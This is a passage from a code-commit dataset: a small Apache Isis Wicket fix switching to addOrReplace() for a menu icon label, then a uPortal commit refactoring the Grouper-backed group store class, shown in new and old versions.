ISIS-537 AddOrReplace the fontAwesome label instead of just adding it. https://trello.com/c/zbSyGgni/58-ctrl-r-force-refresh-throws-exception https://trello.com/c/hXB0uIlM/80-exception-when-switch-theme-eg-if-displaying-a-todo-item
component/viewer/wicket/ui/src/main/java/org/apache/isis/viewer/wicket/ui/components/widgets/cssmenu/ApplicationActionsPanel.java
ISIS-537 AddOrReplace the fontAwesome label instead of just adding it.
<ide><path>omponent/viewer/wicket/ui/src/main/java/org/apache/isis/viewer/wicket/ui/components/widgets/cssmenu/ApplicationActionsPanel.java <ide> } else { <ide> Label dummy = new Label("menuLinkFontAwesome", ""); <ide> dummy.add(new CssClassAppender(cssClassFa)); <del> subMenuItemLink.add(dummy); <add> subMenuItemLink.addOrReplace(dummy); <ide> } <ide> <ide> }
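The diff above swaps Wicket's add(...) for addOrReplace(...) when attaching the Font Awesome label. The point is that MarkupContainer.add(...) fails if a child with the same wicket:id was already added, which can happen when the same link is re-populated (for example on a forced refresh), whereas addOrReplace(...) removes the existing child first and is therefore safe to call on every pass. A minimal sketch of the pattern follows; the helper class and its attachIcon method are hypothetical names, not part of the commit.

package org.apache.isis.viewer.wicket.ui.components.widgets.cssmenu;

import org.apache.isis.viewer.wicket.ui.util.CssClassAppender;
import org.apache.wicket.MarkupContainer;
import org.apache.wicket.markup.html.basic.Label;

// Hypothetical helper, for illustration only.
final class FontAwesomeIconHelper {

    private FontAwesomeIconHelper() {
    }

    static void attachIcon(final MarkupContainer link, final String cssClassFa) {
        final Label icon = new Label("menuLinkFontAwesome", "");
        icon.add(new CssClassAppender(cssClassFa));
        // link.add(icon) would throw on a second call because a child with this
        // wicket:id already exists; addOrReplace(icon) swaps the old child out.
        link.addOrReplace(icon);
    }
}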
Java
apache-2.0
ea80073be8f96d379d804115c9ffbb8c11ee56a2
0
MichaelVose2/uPortal,apetro/uPortal,phillips1021/uPortal,apetro/uPortal,drewwills/uPortal,EdiaEducationTechnology/uPortal,drewwills/uPortal,phillips1021/uPortal,ASU-Capstone/uPortal,jhelmer-unicon/uPortal,doodelicious/uPortal,ASU-Capstone/uPortal-Forked,kole9273/uPortal,doodelicious/uPortal,joansmith/uPortal,bjagg/uPortal,vbonamy/esup-uportal,groybal/uPortal,andrewstuart/uPortal,GIP-RECIA/esup-uportal,vertein/uPortal,kole9273/uPortal,stalele/uPortal,jameswennmacher/uPortal,GIP-RECIA/esup-uportal,andrewstuart/uPortal,EdiaEducationTechnology/uPortal,joansmith/uPortal,MichaelVose2/uPortal,ChristianMurphy/uPortal,kole9273/uPortal,ASU-Capstone/uPortal-Forked,joansmith/uPortal,chasegawa/uPortal,cousquer/uPortal,Mines-Albi/esup-uportal,phillips1021/uPortal,EsupPortail/esup-uportal,kole9273/uPortal,EdiaEducationTechnology/uPortal,drewwills/uPortal,vertein/uPortal,GIP-RECIA/esup-uportal,Jasig/SSP-Platform,jameswennmacher/uPortal,chasegawa/uPortal,stalele/uPortal,pspaude/uPortal,jl1955/uPortal5,jhelmer-unicon/uPortal,ASU-Capstone/uPortal,chasegawa/uPortal,ASU-Capstone/uPortal-Forked,groybal/uPortal,timlevett/uPortal,EsupPortail/esup-uportal,phillips1021/uPortal,stalele/uPortal,vbonamy/esup-uportal,chasegawa/uPortal,chasegawa/uPortal,kole9273/uPortal,jl1955/uPortal5,jonathanmtran/uPortal,andrewstuart/uPortal,ASU-Capstone/uPortal-Forked,bjagg/uPortal,Jasig/uPortal-start,timlevett/uPortal,vertein/uPortal,jl1955/uPortal5,Jasig/SSP-Platform,Jasig/SSP-Platform,phillips1021/uPortal,apetro/uPortal,mgillian/uPortal,jameswennmacher/uPortal,apetro/uPortal,Jasig/uPortal,stalele/uPortal,ChristianMurphy/uPortal,timlevett/uPortal,ASU-Capstone/uPortal,joansmith/uPortal,Jasig/uPortal,drewwills/uPortal,groybal/uPortal,andrewstuart/uPortal,doodelicious/uPortal,ASU-Capstone/uPortal-Forked,jonathanmtran/uPortal,jhelmer-unicon/uPortal,Mines-Albi/esup-uportal,Jasig/SSP-Platform,cousquer/uPortal,ASU-Capstone/uPortal,jameswennmacher/uPortal,bjagg/uPortal,Mines-Albi/esup-uportal,pspaude/uPortal,pspaude/uPortal,vertein/uPortal,jameswennmacher/uPortal,ASU-Capstone/uPortal,doodelicious/uPortal,GIP-RECIA/esco-portail,vbonamy/esup-uportal,Jasig/uPortal,GIP-RECIA/esup-uportal,apetro/uPortal,MichaelVose2/uPortal,joansmith/uPortal,jhelmer-unicon/uPortal,MichaelVose2/uPortal,vbonamy/esup-uportal,timlevett/uPortal,EsupPortail/esup-uportal,mgillian/uPortal,groybal/uPortal,jhelmer-unicon/uPortal,pspaude/uPortal,jonathanmtran/uPortal,vbonamy/esup-uportal,EsupPortail/esup-uportal,groybal/uPortal,stalele/uPortal,jl1955/uPortal5,Mines-Albi/esup-uportal,Jasig/SSP-Platform,EsupPortail/esup-uportal,cousquer/uPortal,mgillian/uPortal,GIP-RECIA/esup-uportal,jl1955/uPortal5,ChristianMurphy/uPortal,GIP-RECIA/esco-portail,doodelicious/uPortal,EdiaEducationTechnology/uPortal,Mines-Albi/esup-uportal,GIP-RECIA/esco-portail,MichaelVose2/uPortal,andrewstuart/uPortal,Jasig/uPortal-start
/** * Licensed to Jasig under one or more contributor license * agreements. See the NOTICE file distributed with this work * for additional information regarding copyright ownership. * Jasig licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file * except in compliance with the License. You may obtain a * copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.jasig.portal.groups.grouper; import java.util.ArrayList; import java.util.Collections; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.jasig.portal.EntityIdentifier; import org.jasig.portal.groups.EntityGroupImpl; import org.jasig.portal.groups.EntityImpl; import org.jasig.portal.groups.GroupsException; import org.jasig.portal.groups.IEntity; import org.jasig.portal.groups.IEntityGroup; import org.jasig.portal.groups.IEntityGroupStore; import org.jasig.portal.groups.IEntitySearcher; import org.jasig.portal.groups.IEntityStore; import org.jasig.portal.groups.IGroupConstants; import org.jasig.portal.groups.IGroupMember; import org.jasig.portal.groups.ILockableEntityGroup; import org.jasig.portal.security.IPerson; import edu.internet2.middleware.grouperClient.api.GcFindGroups; import edu.internet2.middleware.grouperClient.api.GcGetGroups; import edu.internet2.middleware.grouperClient.api.GcGetMembers; import edu.internet2.middleware.grouperClient.ws.beans.WsFindGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResult; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetMembersResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGroup; import edu.internet2.middleware.grouperClient.ws.beans.WsQueryFilter; import edu.internet2.middleware.grouperClient.ws.beans.WsSubject; /** * GrouperEntityGroupStore provides an implementation of the group store * interface capable of retrieving groups information from Grouper web services. * This implementation uses the standard Grouper client jar to search for group * information. It does not currently support write access or group locking. * * @author Bill Brown * @author Jen Bourey, [email protected] * @version $Revision$ */ public class GrouperEntityGroupStore implements IEntityGroupStore, IEntityStore, IEntitySearcher { /** Logger. */ protected final Log LOGGER = LogFactory .getLog(GrouperEntityGroupStoreFactory.class); /** * Package protected constructor used by the factory method. */ GrouperEntityGroupStore() { /* Package protected. */ if (LOGGER.isDebugEnabled()) { LOGGER.debug(this + " created"); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#contains(org.jasig.portal.groups.IEntityGroup, org.jasig.portal.groups.IGroupMember) */ public boolean contains(IEntityGroup group, IGroupMember member) throws GroupsException { // TODO: Original implementation simply returned the existence of // the member group in the Grouper service. We need to instead // determine if the parent group contains the member. 
return false; } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#find(java.lang.String) */ public IEntityGroup find(String key) throws GroupsException { try { // Search the Grouper server for groups with the specified local // key LOGGER.debug("Searching Grouper for a direct match for key: " + key); WsGroup wsGroup = findGroupFromKey(key); if (wsGroup == null) { return null; } IEntityGroup group = createUportalGroupFromGrouperGroup(wsGroup); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved group from the Grouper server matching key " + key + ": " + group.toString()); } // return the group return group; } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "group with key " + key + " from Grouper web services", e); return null; } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findContainingGroups(org.jasig.portal.groups.IGroupMember) */ @SuppressWarnings("unchecked") public Iterator findContainingGroups(IGroupMember gm) throws GroupsException { if (gm.isGroup()) { // TODO: need to add support for retrieving the parents of // groups return new LinkedList<IEntityGroup>().iterator(); } else { GcGetGroups getGroups = new GcGetGroups(); // Determine the key to use for this entity. If the entity is a // group, we should use the group's local key (excluding the // "grouper." portion of the full key. If the entity is not a // group type, just use the key. String key = null; if (gm instanceof IEntityGroup) { key = ((IEntityGroup) gm).getLocalKey(); } else { key = gm.getKey(); } getGroups.addSubjectIdentifier(key); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for parent groups of the entity with key: " + key); } try { WsGetGroupsResults results = getGroups.execute(); final List<IEntityGroup> parents = new LinkedList<IEntityGroup>(); if (results == null || results.getResults() == null || results.getResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return parents.iterator(); } // add each returned group to the parents list for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { if (LOGGER.isDebugEnabled()) { LOGGER.trace("Retrieved group: " + g.getName()); } IEntityGroup parent = createUportalGroupFromGrouperGroup(g); } } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved " + parents.size() + " parent groups of entity with key " + key); } return parents.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "parents for entity with key " + key + " from Grouper web services", e); return Collections.<IEntityGroup>emptyList().iterator(); } } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findEntitiesForGroup(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public Iterator findEntitiesForGroup(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for members of the group with key: " + group.getKey()); } try { // execute a search for members of the specified group GcGetMembers getGroupsMembers = new GcGetMembers(); getGroupsMembers.addGroupName(group.getLocalKey()); WsGetMembersResults results = getGroupsMembers.execute(); if (results == null || results.getResults() == null || results.getResults().length == 0 || results.getResults()[0].getWsSubjects() == null) { LOGGER.debug("No members found for Grouper group with key " + group.getLocalKey()); return 
Collections.<IGroupMember>emptyList().iterator(); } WsSubject[] gInfos = results.getResults()[0].getWsSubjects(); final List<IGroupMember> members = new ArrayList<IGroupMember>( gInfos.length); // add each result to the member list for (WsSubject gInfo : gInfos) { // TODO: Is there more reliable logic for determining the entity // type of a Grouper result? // if the member is a person group if (gInfo.getName() != null && gInfo.getName().contains(":")) { LOGGER.trace("creating group member: " + gInfo.getName()); WsGroup wsGroup = findGroupFromKey(gInfo.getAttributeValue(4)); if (wsGroup != null) { IEntityGroup member = createUportalGroupFromGrouperGroup(wsGroup); members.add(member); } } // otherwise assume the member is an individual person else { LOGGER.trace("creating leaf member: " + gInfo.getId()); IGroupMember member = new EntityImpl(gInfo.getId(), IPerson.class); members.add(member); } } // return an iterator for the assembled group return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member entities of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findMemberGroupKeys(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public String[] findMemberGroupKeys(IEntityGroup group) throws GroupsException { // first the get an iterator for the member groups final Iterator<IEntityGroup> it = findMemberGroups(group); // construct a list of group keys from this iterator List<String> keys = new ArrayList<String>(); while (it.hasNext()) { IEntityGroup eg = it.next(); keys.add(eg.getKey()); } // return an iterator over the assembled list return keys.toArray(new String[keys.size()]); } @SuppressWarnings("unchecked") public Iterator findMemberGroups(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching for group-type members of group with key: " + group.getKey()); } try { GcGetGroups getGroups = new GcGetGroups(); getGroups.addSubjectIdentifier(group.getLocalKey()); WsGetGroupsResults results = getGroups.execute(); if (results == null || results.getResults() == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("No group-type members found for group with key " + group.getKey()); } return Collections.<IEntityGroup>emptyList().iterator(); } final List<IEntityGroup> members = new ArrayList<IEntityGroup>(); for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { IEntityGroup member = createUportalGroupFromGrouperGroup(g); members.add(member); if (LOGGER.isTraceEnabled()) { LOGGER.trace("found IEntityGroup member: " + member); } } } } return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member groups of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } public EntityIdentifier[] searchForGroups(final String query, final int method, @SuppressWarnings("unchecked") final Class leaftype) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for groups matching query: " + query); } // result groups. 
List<EntityIdentifier> groups = new ArrayList<EntityIdentifier>(); try { // TODO: searches need to be performed against the group display // name rather than the group key GcFindGroups groupSearch = new GcFindGroups(); WsQueryFilter filter = new WsQueryFilter(); filter.setQueryFilterType("FIND_BY_GROUP_NAME_APPROXIMATE"); filter.setGroupName(query); groupSearch.assignQueryFilter(filter); WsFindGroupsResults results = groupSearch.execute(); if (results != null && results.getGroupResults() != null) { for (WsGroup g : results.getGroupResults()) { LOGGER.trace("Retrieved group: " + g.getName()); groups.add(new EntityIdentifier(g.getName(), IEntityGroup.class)); } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Returning " + groups.size() + " results for query " + query); } return (EntityIdentifier[]) groups .toArray(new EntityIdentifier[] {}); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "search results for query " + query + " and entity type " + leaftype.getCanonicalName(), e); return new EntityIdentifier[] {}; } } /** * Test a Grouper {WsGroup} against a query string according to the specified * method and determine if it matches the query. * * @param group WsGroup to be tested * @param query Query string * @param method int-based method matching one of the standard search methods * defined in {IGroupConstants} * @return <code>true</code> if the group matches, <code>false</code> * otherwise */ protected boolean groupMatches(WsGroup group, String query, int method) { // Ensure that this group has a name defined before performing // comparisons. if (group == null || group.getName() == null) { return false; } switch (method) { case IGroupConstants.IS: return group.getName().equals(query); case IGroupConstants.STARTS_WITH: return group.getName().startsWith(query); case IGroupConstants.ENDS_WITH: return group.getName().endsWith(query); case IGroupConstants.CONTAINS: return group.getName().contains(query); default: return false; } } /** * Construct an IEntityGroup from a Grouper WsGroup. * * @param wsGroup * @return the group */ protected IEntityGroup createUportalGroupFromGrouperGroup(WsGroup wsGroup) { IEntityGroup iEntityGroup = new EntityGroupImpl(wsGroup.getName(), IPerson.class); // need to set the group name and description to the actual // display name and description iEntityGroup.setName(wsGroup.getDisplayName()); iEntityGroup.setDescription(wsGroup.getDescription()); return iEntityGroup; } /** * Find the Grouper group matching the specified key. * * @param key * @return the group or null */ protected WsGroup findGroupFromKey(String key) { GcFindGroups gcFindGroups = new GcFindGroups(); gcFindGroups.addGroupName(key); WsFindGroupsResults results = gcFindGroups.execute(); // if no results were returned, return null if (results == null || results.getGroupResults() == null || results.getGroupResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return null; } // construct a uPortal group representation of the first returned // result WsGroup wsGroup = results.getGroupResults()[0]; return wsGroup; } /* * UNSUPPORTED WRITE OPERATIONS * * The Grouper group service does not currently support operations that * require write access or locking. This implementation may be updated * in the future to include those features. 
*/ /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#update(org.jasig.portal.groups.IEntityGroup) */ public void update(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#updateMembers(org.jasig.portal.groups.IEntityGroup) */ public void updateMembers(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#delete(org.jasig.portal.groups.IEntityGroup) */ public void delete(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group deletion is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findLockable(java.lang.String) */ public ILockableEntityGroup findLockable(String key) throws GroupsException { throw new UnsupportedOperationException( "Group locking is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#newInstance(java.lang.Class) */ @SuppressWarnings("unchecked") public IEntityGroup newInstance(Class entityType) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String) */ public IEntity newInstance(String key) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String, java.lang.Class) */ @SuppressWarnings("unchecked") public IEntity newInstance(String key, Class type) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntitySearcher#searchForEntities(java.lang.String, int, java.lang.Class) */ @SuppressWarnings("unchecked") public EntityIdentifier[] searchForEntities(String query, int method, Class type) throws GroupsException { throw new UnsupportedOperationException( "Entity search is not supported by the Grouper groups service"); } }
uportal-war/src/main/java/org/jasig/portal/groups/grouper/GrouperEntityGroupStore.java
/** * Licensed to Jasig under one or more contributor license * agreements. See the NOTICE file distributed with this work * for additional information regarding copyright ownership. * Jasig licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file * except in compliance with the License. You may obtain a * copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.jasig.portal.groups.grouper; import java.util.ArrayList; import java.util.Collections; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.jasig.portal.EntityIdentifier; import org.jasig.portal.groups.EntityGroupImpl; import org.jasig.portal.groups.EntityImpl; import org.jasig.portal.groups.GroupsException; import org.jasig.portal.groups.IEntity; import org.jasig.portal.groups.IEntityGroup; import org.jasig.portal.groups.IEntityGroupStore; import org.jasig.portal.groups.IEntitySearcher; import org.jasig.portal.groups.IEntityStore; import org.jasig.portal.groups.IGroupConstants; import org.jasig.portal.groups.IGroupMember; import org.jasig.portal.groups.ILockableEntityGroup; import org.jasig.portal.security.IPerson; import edu.internet2.middleware.grouperClient.api.GcFindGroups; import edu.internet2.middleware.grouperClient.api.GcGetGroups; import edu.internet2.middleware.grouperClient.api.GcGetMembers; import edu.internet2.middleware.grouperClient.ws.beans.WsFindGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResult; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetMembersResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGroup; import edu.internet2.middleware.grouperClient.ws.beans.WsQueryFilter; import edu.internet2.middleware.grouperClient.ws.beans.WsSubject; /** * GrouperEntityGroupStore provides an implementation of the group store * interface capable of retrieving groups information from Grouper web services. * This implementation uses the standard Grouper client jar to search for group * information. It does not currently support write access or group locking. * * @author Bill Brown * @author Jen Bourey, [email protected] * @version $Revision$ */ public class GrouperEntityGroupStore implements IEntityGroupStore, IEntityStore, IEntitySearcher { /** Logger. */ protected final Log LOGGER = LogFactory .getLog(GrouperEntityGroupStoreFactory.class); /** * Package protected constructor used by the factory method. */ GrouperEntityGroupStore() { /* Package protected. */ if (LOGGER.isDebugEnabled()) { LOGGER.debug(this + " created"); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#contains(org.jasig.portal.groups.IEntityGroup, org.jasig.portal.groups.IGroupMember) */ public boolean contains(IEntityGroup group, IGroupMember member) throws GroupsException { // TODO: Original implementation simply returned the existence of // the member group in the Grouper service. We need to instead // determine if the parent group contains the member. 
return false; } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#find(java.lang.String) */ public IEntityGroup find(String key) throws GroupsException { try { // Search the Grouper server for groups with the specified local // key LOGGER.debug("Searching Grouper for a direct match for key: " + key); GcGetGroups getGroups = new GcGetGroups(); getGroups.addSubjectIdentifier(key); WsGetGroupsResults results = getGroups.execute(); // if no results were returned, return null if (results == null || results.getResults() == null || results.getResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return null; } // construct a uPortal group representation of the first returned // result WsSubject subject = results.getResults()[0].getWsSubject(); IEntityGroup group = new EntityGroupImpl(subject.getName(), IPerson.class); // TODO: need to set the group name and description to the actual // display name and description group.setName(subject.getName()); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved group from the Grouper server matching key " + key + ": " + group.toString()); } // return the group return group; } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "group with key " + key + " from Grouper web services", e); return null; } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findContainingGroups(org.jasig.portal.groups.IGroupMember) */ @SuppressWarnings("unchecked") public Iterator findContainingGroups(IGroupMember gm) throws GroupsException { if (gm.isGroup()) { // TODO: need to add support for retrieving the parents of // groups return new LinkedList<IEntityGroup>().iterator(); } else { GcGetGroups getGroups = new GcGetGroups(); // Determine the key to use for this entity. If the entity is a // group, we should use the group's local key (excluding the // "grouper." portion of the full key. If the entity is not a // group type, just use the key. 
String key = null; if (gm instanceof IEntityGroup) { key = ((IEntityGroup) gm).getLocalKey(); } else { key = gm.getKey(); } getGroups.addSubjectIdentifier(key); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for parent groups of the entity with key: " + key); } try { WsGetGroupsResults results = getGroups.execute(); final List<IEntityGroup> parents = new LinkedList<IEntityGroup>(); if (results == null || results.getResults() == null || results.getResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return parents.iterator(); } // add each returned group to the parents list for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { if (LOGGER.isDebugEnabled()) { LOGGER.trace("Retrieved group: " + g.getName()); } IEntityGroup parent = new EntityGroupImpl(g.getName(), IPerson.class); // TODO: set display name and description parent.setName(g.getName()); } } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved " + parents.size() + " parent groups of entity with key " + key); } return parents.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "parents for entity with key " + key + " from Grouper web services", e); return Collections.<IEntityGroup>emptyList().iterator(); } } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findEntitiesForGroup(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public Iterator findEntitiesForGroup(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for members of the group with key: " + group.getKey()); } try { // execute a search for members of the specified group GcGetMembers getGroupsMembers = new GcGetMembers(); getGroupsMembers.addGroupName(group.getLocalKey()); WsGetMembersResults results = getGroupsMembers.execute(); if (results == null || results.getResults() == null || results.getResults().length == 0 || results.getResults()[0].getWsSubjects() == null) { LOGGER.debug("No members found for Grouper group with key " + group.getLocalKey()); return Collections.<IGroupMember>emptyList().iterator(); } WsSubject[] gInfos = results.getResults()[0].getWsSubjects(); final List<IGroupMember> members = new ArrayList<IGroupMember>( gInfos.length); // add each result to the member list for (WsSubject gInfo : gInfos) { // TODO: Is there more reliable logic for determining the entity // type of a Grouper result? 
// if the member is a person group if (gInfo.getName() != null && gInfo.getName().contains(":")) { LOGGER.trace("creating group member: " + gInfo.getName()); IEntityGroup member = new EntityGroupImpl(gInfo.getAttributeValue(4), IPerson.class); // TODO: set display name and description member.setName(gInfo.getAttributeValue(4)); members.add(member); } // otherwise assume the member is an individual person else { LOGGER.trace("creating leaf member: " + gInfo.getId()); IGroupMember member = new EntityImpl(gInfo.getId(), IPerson.class); members.add(member); } } // return an iterator for the assembled group return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member entities of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findMemberGroupKeys(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public String[] findMemberGroupKeys(IEntityGroup group) throws GroupsException { // first the get an iterator for the member groups final Iterator<IEntityGroup> it = findMemberGroups(group); // construct a list of group keys from this iterator List<String> keys = new ArrayList<String>(); while (it.hasNext()) { IEntityGroup eg = it.next(); keys.add(eg.getKey()); } // return an iterator over the assembled list return keys.toArray(new String[keys.size()]); } @SuppressWarnings("unchecked") public Iterator findMemberGroups(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching for group-type members of group with key: " + group.getKey()); } try { GcGetGroups getGroups = new GcGetGroups(); getGroups.addSubjectIdentifier(group.getLocalKey()); WsGetGroupsResults results = getGroups.execute(); if (results == null || results.getResults() == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("No group-type members found for group with key " + group.getKey()); } return Collections.<IEntityGroup>emptyList().iterator(); } final List<IEntityGroup> members = new ArrayList<IEntityGroup>(); for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { IEntityGroup member = new EntityGroupImpl(g.getName(), IPerson.class); // TODO: set display name and description member.setName(g.getName()); members.add(member); if (LOGGER.isTraceEnabled()) { LOGGER.trace("found IEntityGroup member: " + member); } } } } return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member groups of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } public EntityIdentifier[] searchForGroups(final String query, final int method, @SuppressWarnings("unchecked") final Class leaftype) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for groups matching query: " + query); } // result groups. 
List<EntityIdentifier> groups = new ArrayList<EntityIdentifier>(); try { // TODO: searches need to be performed against the group display // name rather than the group key GcFindGroups groupSearch = new GcFindGroups(); WsQueryFilter filter = new WsQueryFilter(); filter.setQueryFilterType("FIND_BY_GROUP_NAME_APPROXIMATE"); filter.setGroupName(query); groupSearch.assignQueryFilter(filter); WsFindGroupsResults results = groupSearch.execute(); if (results != null && results.getGroupResults() != null) { for (WsGroup g : results.getGroupResults()) { LOGGER.trace("Retrieved group: " + g.getName()); groups.add(new EntityIdentifier(g.getName(), IEntityGroup.class)); } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Returning " + groups.size() + " results for query " + query); } return (EntityIdentifier[]) groups .toArray(new EntityIdentifier[] {}); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "search results for query " + query + " and entity type " + leaftype.getCanonicalName(), e); return new EntityIdentifier[] {}; } } /** * Test a Grouper {WsGroup} against a query string according to the specified * method and determine if it matches the query. * * @param group WsGroup to be tested * @param query Query string * @param method int-based method matching one of the standard search methods * defined in {IGroupConstants} * @return <code>true</code> if the group matches, <code>false</code> * otherwise */ protected boolean groupMatches(WsGroup group, String query, int method) { // Ensure that this group has a name defined before performing // comparisons. if (group == null || group.getName() == null) { return false; } switch (method) { case IGroupConstants.IS: return group.getName().equals(query); case IGroupConstants.STARTS_WITH: return group.getName().startsWith(query); case IGroupConstants.ENDS_WITH: return group.getName().endsWith(query); case IGroupConstants.CONTAINS: return group.getName().contains(query); default: return false; } } /* * UNSUPPORTED WRITE OPERATIONS * * The Grouper group service does not currently support operations that * require write access or locking. This implementation may be updated * in the future to include those features. 
*/ /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#update(org.jasig.portal.groups.IEntityGroup) */ public void update(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#updateMembers(org.jasig.portal.groups.IEntityGroup) */ public void updateMembers(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#delete(org.jasig.portal.groups.IEntityGroup) */ public void delete(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group deletion is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findLockable(java.lang.String) */ public ILockableEntityGroup findLockable(String key) throws GroupsException { throw new UnsupportedOperationException( "Group locking is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#newInstance(java.lang.Class) */ @SuppressWarnings("unchecked") public IEntityGroup newInstance(Class entityType) throws GroupsException { throw new UnsupportedOperationException( 